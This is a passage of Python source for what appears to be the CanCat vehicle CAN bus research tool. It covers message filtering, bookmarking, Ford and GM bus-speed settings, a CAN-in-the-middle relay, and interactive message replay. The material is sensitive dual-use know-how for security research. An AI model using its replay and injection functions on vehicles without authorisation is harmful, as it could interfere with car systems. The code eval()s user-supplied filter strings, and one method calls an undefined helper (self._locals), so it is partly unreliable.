start_baseline_msg = self.getMsgIndexFromBookmark(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmark(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.filterCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def _getLocals(self, idx, ts, arbid, data):
return {'idx':idx, 'ts':ts, 'arbid':arbid, 'data':data}
def filterCanMsgs(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], tail=False, maxsecs=None):
'''
returns the received CAN messages between indexes "start_msg" and "stop_msg"
but only messages to ID's that *do not* appear in the the baseline indicated
by "start_baseline_msg" and "stop_baseline_msg".
for message indexes, you *will* want to look into the bookmarking subsystem!
'''
self.log("starting filtering messages...")
if stop_baseline_msg != None:
self.log("ignoring arbids from baseline...")
# get a list of baseline arbids
filter_ids = { arbid:1 for idx,ts,arbid,data in self.genCanMsgs(start_baseline_msg, stop_baseline_msg)
}.keys()
else:
filter_ids = None
self.log("filtering messages...")
if arbids != None and type(arbids) != list:
arbids = [arbids]
for idx,ts,arbid,msg in self.genCanMsgs(start_msg, stop_msg, arbids=arbids, tail=tail, maxsecs=maxsecs):
if not ((arbids != None and arbid in arbids) or arbid not in ignore and (filter_ids==None or arbid not in filter_ids)):
self.log("skipping message: (%r, %r, %r, %r)" % ((idx, ts, arbid, msg)))
continue
            # advanced filters allow python code to be handed in. if any of the python code snippets results in "False" or 0, skip this message
skip = False
for advf in advfilters:
lcls = self._getLocals(idx, ts, arbid, msg)
if not eval(advf, lcls):
skip = True
if skip:
self.log("skipping message(adv): (%r, %r, %r, %r)" % ((idx, ts, arbid, msg)))
continue
yield (idx, ts, arbid, msg)
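    # Illustrative usage only (the message indexes are assumptions for the
    # example): show messages 1000-2000 whose arbitration IDs never appear in
    # the baseline captured in messages 0-999:
    #
    #   for idx, ts, arbid, msg in cc.filterCanMsgs(start_msg=1000, stop_msg=2000,
    #                                               start_baseline_msg=0,
    #                                               stop_baseline_msg=999):
    #       print reprCanMsg(idx, ts, arbid, msg)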
def printCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
'''
deprecated: use printCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
print self.reprCanMsgsByBookmark(start_bkmk, stop_bkmk, start_baseline_bkmk, stop_baseline_bkmk, arbids, ignore, advfilters)
def reprCanMsgsByBookmark(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None, arbids=None, ignore=[], advfilters=[]):
'''
deprecated: use reprCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
out = []
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
else:
            stop_msg = None
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmark(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmark(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.reprCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def printCanMsgs(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, paginate=None, viewbits=VIEW_ALL):
data = self.reprCanMsgsLines(start_msg, stop_msg, start_bkmk, stop_bkmk, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters, pretty, viewbits=viewbits)
pidx = 0
try:
while True:
line = data.next()
lines = line.split('\n')
for thing in lines:
print thing
pidx += 1
if paginate != None and pidx % paginate == 0:
inp = raw_input("PRESS ENTER TO CONTINUE")
except StopIteration:
pass
def reprCanMsgsLines(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, tail=False, viewbits=VIEW_ALL):
# FIXME: make different stats selectable using a bitfield arg (eg. REPR_TIME_DELTA | REPR_ASCII)
'''
String representation of a set of CAN Messages.
These can be filtered by start and stop message indexes, as well as
use a baseline (defined by start/stop message indexes),
by a list of "desired" arbids as well as a list of
ignored arbids
Many functions wrap this one.
viewbits is a bitfield made up of VIEW_* options OR'd together:
... viewbits=VIEW_ASCII|VIEW_COMPARE)
'''
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmark(start_bkmk)
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmark(stop_bkmk)
if (viewbits & VIEW_BOOKMARKS) and start_msg in self.bookmarks:
bkmk = self.bookmarks.index(start_msg)
yield ("starting from bookmark %d: '%s'" %
(bkmk,
self.bookmark_info[bkmk].get('name'))
)
if (viewbits & VIEW_BOOKMARKS) and stop_msg in self.bookmarks:
bkmk = self.bookmarks.index(stop_msg)
yield ("stoppng at bookmark %d: '%s'" %
(bkmk,
self.bookmark_info[bkmk].get('name'))
)
last_msg = None
next_bkmk = 0
next_bkmk_idx = 0
msg_count = 0
last_ts = None
tot_delta_ts = 0
counted_msgs = 0 # used for calculating averages, excluding outliers
data_delta = None
data_repeat = 0
data_similar = 0
for idx, ts, arbid, msg in self.filterCanMsgs(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids=arbids, ignore=ignore, advfilters=advfilters, tail=tail):
# insert bookmark names/comments in appropriate places
while next_bkmk_idx < len(self.bookmarks) and idx >= self.bookmarks[next_bkmk_idx]:
yield (self.reprBookmark(next_bkmk_idx))
next_bkmk_idx += 1
msg_count += 1
diff = []
# check data
byte_cnt_diff = 0
if (viewbits & VIEW_COMPARE) and last_msg != None:
if len(last_msg) == len(msg):
for bidx in range(len(msg)):
if last_msg[bidx] != msg[bidx]:
byte_cnt_diff += 1
if byte_cnt_diff == 0:
diff.append("REPEAT")
data_repeat += 1
elif byte_cnt_diff <=4:
diff.append("Similar")
data_similar += 1
# FIXME: make some better heuristic to identify "out of norm"
# look for ASCII data (4+ consecutive bytes)
if (viewbits & VIEW_ASCII) and hasAscii(msg):
diff.append("ASCII: %s" % repr(msg))
# calculate timestamp delta and comment if out of whack
if last_ts == None:
last_ts = ts
delta_ts = ts - last_ts
if counted_msgs:
avg_delta_ts = tot_delta_ts / counted_msgs
else:
avg_delta_ts = delta_ts
if abs(delta_ts - avg_delta_ts) <= delta_ts:
tot_delta_ts += delta_ts
counted_msgs += 1
elif (viewbits & VIEW_TS_DELTA):
diff.append("TS_delta: %.3f" % delta_ts)
if pretty:
if delta_ts >= .95:
yield ('')
msgrepr = self._reprCanMsg(idx, ts, arbid, msg, comment='\t'.join(diff))
# allow _reprCanMsg to return None to skip printing the message
if msgrepr != DONT_PRINT_THIS_MESSAGE:
yield msgrepr
last_ts = ts
last_msg = msg
if viewbits & VIEW_ENDSUM:
yield ("Total Messages: %d (repeat: %d / similar: %d)" % (msg_count, data_repeat, data_similar))
def reprCanMsgs(self, start_msg=0, stop_msg=None, start_bkmk=None, stop_bkmk=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[], pretty=False, tail=False, viewbits=VIEW_ALL):
out = [x for x in self.reprCanMsgsLines(start_msg, stop_msg, start_bkmk, stop_bkmk, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters, pretty, tail, viewbits)]
return "\n".join(out)
def _reprCanMsg(self, idx, ts, arbid, msg, comment=None):
return reprCanMsg(idx, ts, arbid, msg, comment=comment)
def printCanSessions(self, arbid_list=None, advfilters=[]):
'''
Split CAN messages into Arbitration ID's and prints entire
sessions for each CAN id.
Defaults to printing by least number of messages, including all IDs
Or... provide your own list of ArbIDs in whatever order you like
'''
if arbid_list == None:
arbids = self.getArbitrationIds()
else:
arbids = [arbdata for arbdata in self.getArbitrationIds() if arbdata[1] in arbid_list]
for datalen,arbid,msgs in arbids:
print self.reprCanMsgs(arbids=[arbid], advfilters=advfilters)
cmd = raw_input("\n[N]ext, R)eplay, F)astReplay, I)nteractiveReplay, Q)uit: ").upper()
while len(cmd) and cmd != 'N':
if cmd == 'R':
self.CANreplay(arbids=[arbid], timing=TIMING_REAL)
elif cmd == 'F':
self.CANreplay(arbids=[arbid], timing=TIMING_FAST)
elif cmd == 'I':
self.CANreplay(arbids=[arbid], timing=TIMING_INTERACTIVE)
elif cmd == 'Q':
return
cmd = raw_input("\n[N]ext, R)eplay, F)astReplay, I)nteractiveReplay, Q)uit: ").upper()
print
def printBookmarks(self):
'''
Print out the list of current Bookmarks and where they sit
'''
print(self.reprBookmarks())
def printAsciiStrings(self, minbytes=4, strict=True):
'''
Search through messages looking for ASCII strings
'''
for idx, ts, arbid, msg in self.genCanMsgs():
if hasAscii(msg, minbytes=minbytes, strict=strict):
print reprCanMsg(idx, ts, arbid, msg, repr(msg))
def reprBookmarks(self):
'''
get a string representation of the bookmarks
'''
out = []
for bid in range(len(self.bookmarks)):
out.append(self.reprBookmark(bid))
return '\n'.join(out)
def reprBookmark(self, bid):
'''
get a string representation of one bookmark
'''
msgidx = self.bookmarks[bid]
info = self.bookmark_info.get(bid)
comment = info.get('comment')
if comment == None:
return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s" % (bid, msgidx, info.get('name'))
return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s \tcomment: %s" % (bid, msgidx, info.get('name'), info.get('comment'))
def setMaskAndFilter(self,
mask0=0,
mask1=0,
filter0=0,
filter1=0,
filter2=0,
filter3=0,
filter4=0,
filter5=0):
'''
Set the filters and masks. The mask determines which bits matter for the filter following the
below truth table:
_____________________________________________________________________________
| Mask Bit n | Filter Bit n | Arbitration ID bit n | Accept or Reject |
| 0 | X | X | Accept |
| 1 | 0 | 0 | Accept |
| 1 | 0 | 1 | Reject |
| 1 | 1 | 0 | Reject |
| 1 | 1 | 1 | Accept |
-----------------------------------------------------------------------------
There are two RX buffers. mask0 and filters 0 and 1 apply to buffer 0. mask1 and the other four filters
apply to buffer 1.
'''
msg = struct.pack('>IIIIIIII', mask0, mask1, filter0, filter1, filter2, filter3, filter4, filter5)
return self._send(CMD_SET_FILT_MASK, msg)
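    # A minimal sketch of the truth table above, with illustrative values: for
    # 11-bit identifiers a mask of 0x7ff makes every ID bit significant, so each
    # buffer only accepts frames whose arbitration ID exactly matches its filter
    # (here 0x7e8, an assumption for the example):
    #
    #   cc.setMaskAndFilter(mask0=0x7ff, mask1=0x7ff,
    #                       filter0=0x7e8, filter1=0x7e8,
    #                       filter2=0x7e8, filter3=0x7e8,
    #                       filter4=0x7e8, filter5=0x7e8)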
def clearMaskAndFilter(self):
'''
Clears all masks and filters
'''
msg = struct.pack('>IIIIIIII', 0, 0, 0, 0, 0, 0, 0, 0)
return self._send(CMD_SET_FILT_MASK, msg)
def _test_throughput(self):
'''
        Use in conjunction with the M2_TEST_FW to test throughput.
        Connect one CanCat up to another M2 or Arduino DUE device running the M2_TEST_FW firmware
and run this function to perform a throughput test. No other device should be connected
to allow the test to run unimpeded by other CAN traffic.
'''
self.clearCanMsgs()
self.CANxmit(0x0010, "TEST")
for i in range(6, 3, -1):
print "Time remaining: ", i*10, " seconds"
time.sleep(10)
self.CANxmit(0x810, "TEST", extflag=True)
for i in range(3, 0, -1):
print "Time remaining: ", i*10, " seconds"
time.sleep(10)
out_of_order_count = 0
msg_count = 0
prev_val = 0xFF
for foo in self.genCanMsgs(arbids=[0x00]):
msg_count += 1
prev_val += 1
if prev_val > 0xff:
prev_val = 0
if prev_val != ord(foo[3]):
out_of_order_count += 1
prev_val = ord(foo[3])
if (out_of_order_count > 0):
print "ERROR: 11 bit IDs, 1 byte messages, ", out_of_order_count, " Messages received out of order"
elif (msg_count != 181810):
print "ERROR: Received ", msg_count, " out of expected 181810 message"
else:
print "PASS: 11 bit IDs, 1 byte messages"
out_of_order_count = 0
msg_count = 0
prev_val = 0xFF
for foo in self.genCanMsgs(arbids=[0x01]):
msg_count += 1
prev_val += 1
if prev_val > 0xff:
prev_val = 0
if prev_val != ord(foo[3][0]):
out_of_order_count += 1
prev_val = ord(foo[3][0])
if (out_of_order_count > 0):
print "ERROR: 11 bit IDs, 8 byte messages, ", out_of_order_count, " Messages received out of order"
elif (msg_count != 90090):
print "ERROR: Received ", msg_count, " out of expected 90090 message"
else:
print "PASS: 11 bit IDs, 8 byte messages"
out_of_order_count = 0
msg_count = 0
prev_val = 0xFF
for foo in self.genCanMsgs(arbids=[0x800]):
msg_count += 1
prev_val += 1
if prev_val > 0xff:
prev_val = 0
if prev_val != ord(foo[3]):
out_of_order_count += 1
prev_val = ord(foo[3])
if (out_of_order_count > 0):
print "ERROR: 29 bit IDs, 1 byte messages, ", out_of_order_count, " Messages received out of order"
elif (msg_count != 133330):
print "ERROR: Received ", msg_count, " out of expected 133330 message"
else:
print "PASS: 29 bit IDs, 1 byte messages"
out_of_order_count = 0
msg_count = 0
prev_val = 0xFF
for foo in self.genCanMsgs(arbids=[0x801]):
msg_count += 1
prev_val += 1
if prev_val > 0xff:
prev_val = 0
if prev_val != ord(foo[3][0]):
out_of_order_count += 1
prev_val = ord(foo[3][0])
if (out_of_order_count > 0):
print "ERROR: 29 bit IDs, 8 byte messages, ", out_of_order_count, " Messages received out of order"
elif (msg_count != 76330):
print "ERROR: Received ", msg_count, " out of expected 76330 message"
else:
print "PASS: 29 bit IDs, 8 byte messages"
class CanControl(cmd.Cmd):
'''
Command User Interface (as if ipython wasn't enough!)
'''
    def __init__(self, serialdev=serialdev, baud=baud):
        cmd.Cmd.__init__(self)
        self.serialdev = serialdev
        self._baud = baud
        self.canbuf = CanBuffer(self.serialdev, self._baud)
def getAscii(msg, minbytes=3):
'''
    collect runs of printable ASCII characters that are at least minbytes long
    and return them as a list of strings
'''
strings = []
ascii_match = 0
ascii_count = 0
startidx = None
for bidx in range(len(msg)):
byte = msg[bidx]
if 0x20 <= ord(byte) < 0x7f:
if startidx == None:
startidx = bidx
ascii_count +=1
else:
# non printable char
# if we reached the magic threshold, package it
if ascii_count >= minbytes:
strings.append(msg[startidx:bidx])
# reset counters
ascii_count = 0
startidx = None
# in case we have a string all the way to the end
if ascii_count >= minbytes:
strings.append(msg[startidx:])
return strings
def hasAscii(msg, minbytes=3, strict=False):
'''
    if strict, every character has to be clean ASCII
    otherwise, look for runs of at least minbytes printable characters
'''
ascii_match = 0
ascii_count = 0
for byte in msg:
if 0x20 <= ord(byte) < 0x7f:
ascii_count +=1
if ascii_count >= minbytes:
ascii_match = 1
else:
if strict:
return 0
ascii_count = 0
return ascii_match
def reprCanMsg(idx, ts, arbid, data, comment=None):
#TODO: make some repr magic that spits out known ARBID's and other subdata
if comment == None:
comment = ''
return "%.8d %8.3f ID: %.3x, Len: %.2x, Data: %-18s\t%s" % (idx, ts, arbid, len(data), data.encode('hex'), comment)
class FordInterface(CanInterface):
def setCanBaudHSCAN(self):
self.setCanBaud(CAN_500KBPS)
def setCanBaudMSCAN(self):
self.setCanBaud(CAN_125KBPS)
def setCanBaudICAN(self):
self.setCanBaud(CAN_500KBPS)
class GMInterface(CanInterface):
'''
DLC port:
SW-LS-CAN - pin 1 33kbps
MS-CAN - pins 3+ and 11- 95kbps
DW-FT-CAN - pins 1+ and 9- <125kbps
HS-CAN - pins 6+ and 14- 500kbps
'''
def setCanBaudHSCAN(self):
self.setCanBaud(CAN_500KBPS)
def setCanBaudMSCAN(self):
self.setCanBaud(CAN_95KBPS)
def setCanBaudLSCAN(self):
self.setCanBaud(CAN_33KBPS)
class CanInTheMiddleInterface(CanInterface):
def __init__(self, port=serialdev, baud=baud, verbose=False, cmdhandlers=None, comment='', load_filename=None, orig_iface=None):
'''
CAN in the middle. Allows the user to determine what CAN messages are being
sent by a device by isolating a device from the CAN network and using two
Can shields on one Arduino to relay the CAN messages to each other.
Device<----->Isolation CanCat<----->Arduino<----->Vehicle CanCat<----->Vehicle
CAN SPI | SPI CAN
|
| < Serial
PC
This solves the problem of not being able to determine which device is sending
which CAN message, since CAN messages have no source information and all messages
are broadcast.
The Can shield connected to the device is referred to as the isolation CanCat.
This CanCat should be modified so that the CS SPI pin is connected to D10, rather
than the default of D9. This is accomplished by cutting a trace on the circuit
board and bridging the CS pad to the D10 pad. Seeedstudio has instructions
on their Wiki, but their shield differed slightly from my board. The CanCat
connected to the vehicle is referred to as the vehicle CanCat and should be unmodified.
'''
self.bookmarks_iso = []
self.bookmark_info_iso = {}
CanInterface.__init__(self, port=port, baud=baud, verbose=verbose, cmdhandlers=cmdhandlers, comment=comment, load_filename=load_filename, orig_iface=orig_iface)
if load_filename is None:
self.setCanMode(CMD_CAN_MODE_CITM)
def genCanMsgsIso(self, start=0, stop=None, arbids=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
CAN message generator. takes in start/stop indexes as well as a list
of desired arbids (list). Uses the isolation messages.
'''
messages = self._messages.get(CMD_ISO_RECV, [])
if stop == None:
stop = len(messages)
else:
stop = stop + 1
for idx in xrange(start, stop):
ts, msg = messages[idx]
arbid, data = self._splitCanMsg(msg)
if arbids != None and arbid not in arbids:
# allow filtering of arbids
continue
yield((idx, ts, arbid, data))
def getCanMsgCountIso(self):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
the number of CAN messages we've received on the isolation side session
'''
canmsgs = self._messages.get(CMD_ISO_RECV, [])
return len(canmsgs)
def printSessionStatsByBookmarkIso(self, start=None, stop=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
Prints session stats only for messages between two bookmarks
'''
print self.getSessionStatsByBookmarkIso(start, stop)
def printSessionStatsIso(self, start=0, stop=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
Print session stats by Arbitration ID (aka WID/PID/CANID/etc...)
between two message indexes (where they sit in the CMD_CAN_RECV
mailbox)
'''
print self.getSessionStatsIso(start, stop)
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
def getSessionStatsByBookmarkIso(self, start=None, stop=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
returns session stats by bookmarks
'''
if start != None:
start_msg = self.getMsgIndexFromBookmarkIso(start)
else:
start_msg = 0
if stop != None:
stop_msg = self.getMsgIndexFromBookmarkIso(stop)
else:
stop_msg = self.getCanMsgCountIso()
return self.getSessionStatsIso(start=start_msg, stop=stop_msg)
def getArbitrationIdsIso(self, start=0, stop=None, reverse=False):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
return a list of Arbitration IDs
'''
arbids = {}
msg_count = 0
for idx,ts,arbid,data in self.genCanMsgsIso(start, stop):
arbmsgs = arbids.get(arbid)
if arbmsgs == None:
arbmsgs = []
arbids[arbid] = arbmsgs
arbmsgs.append((ts, data))
msg_count += 1
arbid_list = [(len(msgs), arbid, msgs) for arbid,msgs in arbids.items()]
arbid_list.sort(reverse=reverse)
return arbid_list
def getSessionStatsIso(self, start=0, stop=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
out = []
arbid_list = self.getArbitrationIdsIso(start=start, stop=stop, reverse=True)
for datalen, arbid, msgs in arbid_list:
last = 0
high = 0
low = 0xffffffff
for ts, data in msgs:
if last == 0:
last = ts
continue
# calculate the high and low
delta = ts - last
if delta > high:
high = delta
if delta < low:
low = delta
# track repeated values (rounded to nearest .001 sec)
last = ts
if datalen > 1:
mean = (msgs[-1][0] - msgs[0][0]) / (datalen-1)
median = low + (high-low) / 2
else:
low = 0
mean = 0
median = mean
out.append("id: 0x%x\tcount: %d\ttiming:: mean: %.3f\tmedian: %.3f\thigh: %.3f\tlow: %.3f" % \
(arbid, datalen, mean, median, high, low))
msg_count = self.getCanMsgCountIso()
out.append("Total Uniq IDs: %d\nTotal Messages: %d" % (len(arbid_list), msg_count))
return '\n'.join(out)
# bookmark subsystem
def placeCanBookmark(self, name=None, comment=None):
'''
Save a named bookmark (with optional comment).
This stores the message index number from the
CMD_ISO_RECV mailbox.
This also places a bookmark in the normal CAN message
stream.
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
mbox = self._messages.get(CMD_ISO_RECV)
if mbox == None:
msg_index = 0
else:
msg_index = len(mbox)
bkmk_index = len(self.bookmarks_iso)
self.bookmarks_iso.append(msg_index)
info = { 'name' : name,
'comment' : comment }
self.bookmark_info_iso[bkmk_index] = info #should this be msg_index? benefit either way?
CanInterface.placeCanBookmark(self, name=name, comment=comment)
return bkmk_index
def getMsgIndexFromBookmarkIso(self, bkmk_index):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
return self.bookmarks_iso[bkmk_index]
def getBookmarkFromMsgIndexIso(self, msg_index):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
bkmk_index = self.bookmarks_iso.index(msg_index)
return bkmk_index
def setCanBookmarkNameIso(self, bkmk_index, name):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
info = self.bookmark_info_iso[bkmk_index]
info['name'] = name
def setCanBookmarkCommentIso(self, bkmk_index, comment):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
info = self.bookmark_info_iso[bkmk_index]
info['comment'] = comment
def setCanBookmarkNameByMsgIndexIso(self, msg_index, name):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
bkmk_index = self.bookmarks_iso.index(msg_index)
info = self.bookmark_info_iso[bkmk_index]
info['name'] = name
def setCanBookmarkCommentByMsgIndexIso(self, msg_index, comment):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
bkmk_index = self.bookmarks_iso.index(msg_index)
info = self.bookmark_info_iso[bkmk_index]
info['comment'] = comment
def snapshotCanMessagesIso(self, name=None, comment=None):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
Save bookmarks at the start and end of some event you are about to do
Bookmarks are named "Start_" + name and "Stop_" + name
DON'T USE CANrecv or recv(CMD_CAN_RECV) with Bookmarks or Snapshots!!
'''
start_bkmk = self.placeCanBookmark("Start_" + name, comment)
raw_input("Press Enter When Done...")
stop_bkmk = self.placeCanBookmark("Stop_" + name, comment)
def filterCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmarkIso(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmarkIso(stop_bkmk)
else:
stop_msg = None
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmarkIso(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmarkIso(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.filterCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def filterCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
Iso means the second CAN bus (M2's and DUE_CAN models have two CAN interfaces)
returns the received CAN messages between indexes "start_msg" and "stop_msg"
but only messages to IDs that *do not* appear in the baseline indicated
by "start_baseline_msg" and "stop_baseline_msg".
for message indexes, you *will* want to look into the bookmarking subsystem!
'''
self.log("starting filtering messages...")
if stop_baseline_msg != None:
self.log("ignoring arbids from baseline...")
# get a list of baseline arbids
# the baseline indexes refer to the isolation mailbox, so walk the Iso generator
filter_ids = { arbid:1 for idx,ts,arbid,data in self.genCanMsgsIso(start_baseline_msg, stop_baseline_msg) }.keys()
else:
filter_ids = None
self.log("filtering messages...")
if arbids is not None and type(arbids) != list:
arbids = [arbids]
for idx,ts,arbid,msg in self.genCanMsgsIso(start_msg, stop_msg, arbids=arbids):
if not ((arbids != None and arbid in arbids) or arbid not in ignore and (filter_ids==None or arbid not in filter_ids)):
continue
# advanced filters allow python code to be handed in. if any of the python code snippits result in "False" or 0, skip this message
skip = False
for advf in advfilters:
lcls = self._locals(idx, ts, arbid, msg)
if not eval(advf, lcls):
skip = True
if skip:
continue
yield (idx, ts,arbid,msg)
def printCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None,
arbids=None, ignore=[], advfilters=[]):
'''
deprecated: use printCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
print self.reprCanMsgsByBookmarkIso(start_bkmk, stop_bkmk, start_baseline_bkmk, stop_baseline_bkmk, arbids, ignore, advfilters)
def reprCanMsgsByBookmarkIso(self, start_bkmk=None, stop_bkmk=None, start_baseline_bkmk=None, stop_baseline_bkmk=None, arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
deprecated: use reprCanMsgs(start_bkmk=foo, stop_bkmk=bar)
'''
out = []
if start_bkmk != None:
start_msg = self.getMsgIndexFromBookmarkIso(start_bkmk)
else:
start_msg = 0
if stop_bkmk != None:
stop_msg = self.getMsgIndexFromBookmarkIso(stop_bkmk)
else:
stop_msg = None
if start_baseline_bkmk != None:
start_baseline_msg = self.getMsgIndexFromBookmarkIso(start_baseline_bkmk)
else:
start_baseline_msg = None
if stop_baseline_bkmk != None:
stop_baseline_msg = self.getMsgIndexFromBookmarkIso(stop_baseline_bkmk)
else:
stop_baseline_msg = None
return self.reprCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def printCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
print self.reprCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids, ignore, advfilters)
def reprCanMsgsIso(self, start_msg=0, stop_msg=None, start_baseline_msg=None, stop_baseline_msg=None, arbids=None, ignore=[], advfilters=[]):
# FIXME: move to "indexed" CAN interfaces, to allow for up to 10 or more without new code.
'''
String representation of a set of CAN Messages.
These can be filtered by start and stop message indexes, as well as
use a baseline (defined by start/stop message indexes),
by a list of "desired" arbids as well as a list of
ignored arbids
Many functions wrap this one.
'''
out = []
if start_msg in self.bookmarks_iso:
bkmk = self.bookmarks_iso.index(start_msg)
out.append("starting from bookmark %d: '%s'" %
(bkmk,
self.bookmark_info_iso[bkmk].get('name'))
)
if stop_msg in self.bookmarks_iso:
bkmk = self.bookmarks_iso.index(stop_msg)
out.append("stoppng at bookmark %d: '%s'" %
(bkmk,
self.bookmark_info_iso[bkmk].get('name'))
)
last_msg = None
next_bkmk = 0
next_bkmk_idx = 0
msg_count = 0
last_ts = None
tot_delta_ts = 0
counted_msgs = 0 # used for calculating averages, excluding outliers
data_delta = None
data_repeat = 0
data_similar = 0
for idx, ts, arbid, msg in self.filterCanMsgsIso(start_msg, stop_msg, start_baseline_msg, stop_baseline_msg, arbids=arbids, ignore=ignore, advfilters=advfilters):
diff = []
# insert bookmark names/comments in appropriate places
while next_bkmk_idx < len(self.bookmarks_iso) and idx >= self.bookmarks_iso[next_bkmk_idx]:
out.append(self.reprBookmarkIso(next_bkmk_idx))
next_bkmk_idx += 1
msg_count += 1
# check data
byte_cnt_diff = 0
if last_msg != None:
if len(last_msg) == len(msg):
for bidx in range(len(msg)):
if last_msg[bidx] != msg[bidx]:
byte_cnt_diff += 1
if byte_cnt_diff == 0:
diff.append("REPEAT")
data_repeat += 1
elif byte_cnt_diff <=4:
diff.append("Similar")
data_similar += 1
# FIXME: make some better heuristic to identify "out of norm"
# look for ASCII data (4+ consecutive bytes)
if hasAscii(msg):
diff.append("ASCII: %s" % repr(msg))
# calculate timestamp delta and comment if out of whack
if last_ts == None:
last_ts = ts
delta_ts = ts - last_ts
if counted_msgs:
avg_delta_ts = tot_delta_ts / counted_msgs
else:
avg_delta_ts = delta_ts
if abs(delta_ts - avg_delta_ts) <= delta_ts:
tot_delta_ts += delta_ts
counted_msgs += 1
else:
diff.append("TS_delta: %.3f" % delta_ts)
out.append(reprCanMsg(idx, ts, arbid, msg, comment='\t'.join(diff)))
last_ts = ts
last_msg = msg
out.append("Total Messages: %d (repeat: %d / similar: %d)" % (msg_count, data_repeat, data_similar))
return "\n".join(out)
def printCanSessionsIso(self, arbid_list=None, advfilters=[]):
'''
Split CAN messages into Arbitration ID's and prints entire
sessions for each CAN id.
Defaults to printing by least number of messages, including all IDs
Or... provide your own list of ArbIDs in whatever order you like
'''
if arbid_list == None:
arbids = self.getArbitrationIdsIso()
else:
arbids = [arbdata for arbdata in self.getArbitrationIdsIso() if arbdata[1] in arbid_list]
for datalen,arbid,msgs in arbids:
print self.reprCanMsgsIso(arbids=[arbid], advfilters=advfilters)
raw_input("\nPress Enter to review the next Session...")
print
def printBookmarksIso(self):
'''
Print out the list of current Bookmarks and where they sit
'''
print(self.reprBookmarksIso())
def printAsciiStringsIso(self, minbytes=4, strict=True):
'''
Search through messages looking for ASCII strings
'''
for idx, ts, arbid, msg in self.genCanMsgsIso():
if hasAscii(msg, minbytes=minbytes, strict=strict):
